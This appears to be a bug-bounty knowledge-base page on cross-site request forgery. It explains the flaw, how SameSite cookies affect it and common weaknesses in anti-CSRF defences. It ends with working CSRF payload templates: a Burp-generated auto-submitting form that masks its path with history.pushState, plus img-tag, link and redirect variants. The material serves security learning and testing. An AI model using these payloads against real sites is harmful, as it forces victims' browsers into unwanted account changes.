Cross-Site Request Forgery (CSRF)


Last updated 1 year ago


What is it?

CSRF, short for cross-site request forgery, is a web security flaw that lets an attacker make a logged-in user's browser send a state-changing request the user never intended (changing an email address, adding an account, transferring money). The attacker chooses the request; the victim's browser supplies the credentials.

A simple example:

  • A vulnerable web application has the endpoint /updateProfile?id={userid}

  • When a POST request is made to this endpoint the application:

    • Checks that the id matches the logged-in user, identified by the session cookie

    • If it does, updates the profile with the information in the request body

  • When the victim visits the attacker's site, the attacker's page:

    • Submits a request to that endpoint (for example with an auto-submitting form), using the victim's id and an attacker-chosen body

    • Because the victim is logged in, the browser attaches the application's cookies (importantly, the session cookie) to that request. Whether it does depends on the cookie's SameSite attribute: a cookie marked SameSite=Strict or SameSite=Lax is not sent on a cross-site POST, and Chromium-based browsers treat a cookie set without the attribute as Lax (with a short grace period for freshly set cookies), so the classic form-post attack needs a cookie that is SameSite=None or a browser that does not apply that default

  • The vulnerable application processes the request as normal: from the server's point of view it is an authenticated request from the victim's browser, and the id check passes because the attacker used the victim's own id

CSRF needs some user interaction: the victim has to load the attacker's page. Typically the attacker hosts the payload on a site they control and entices the target there with phishing emails, direct messages on social media, etc. Once the victim clicks the link and the page loads, the payload fires; an auto-submitting form or an img tag needs no further clicks from the victim.

CSRF defences (anti-CSRF tokens, SameSite cookies, Origin/Referer checks) are now pretty common, so along with finding places where users can carry out state-changing actions, we also need to spot defences that have not been implemented properly: a token that is not validated or not tied to the user's session, a token that is only checked when present, a Referer check that is skipped when the header is missing, or a POST-only endpoint that also accepts the same parameters over GET.

Other learning resources:

  • PortSwigger: Web Security Academy, CSRF (https://portswigger.net/web-security/csrf)

  • The XSS Rat: Bug Bounty Beginner Methodology: CSRF (https://www.youtube.com/watch?v=uirJsgvN7Hc)

  • swisskyrepo: PayloadsAllTheThings, CSRF Injection (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/README.md)

Writeups:

Checklist

Exploitation

Auto-submitting POST form, as generated by Burp Suite Pro's CSRF PoC generator. The history.pushState call rewrites the address bar to / so the attacker page's real path is not visible while the form submits:

```html
<!-- original payload generated from BURP Suite Pro -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://<target-site>/api/employees/add" method="POST">
      <input type="hidden" name="name" value="<payload-info>" />
      <input type="hidden" name="email" value="<payload-info>" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

GET-based payloads. These only work if the endpoint also accepts the parameters over GET, which is worth checking whenever a POST-only form is in scope:

```html
<!-- requires user interaction: the victim has to click the link -->
<a href="http://<target-site>/api/employees/add?name=<payload-info>">Click Me</a>

<!-- doesn't require user interaction: the browser fetches the image URL as soon as the page loads -->
<img src="http://<target-site>/api/employees/add?name=<payload-info>">
```

```javascript
// doesn't require user interaction: navigates the victim's browser to the URL
document.location = 'https://<target-site>/employees/add?name=<payload-info>';
```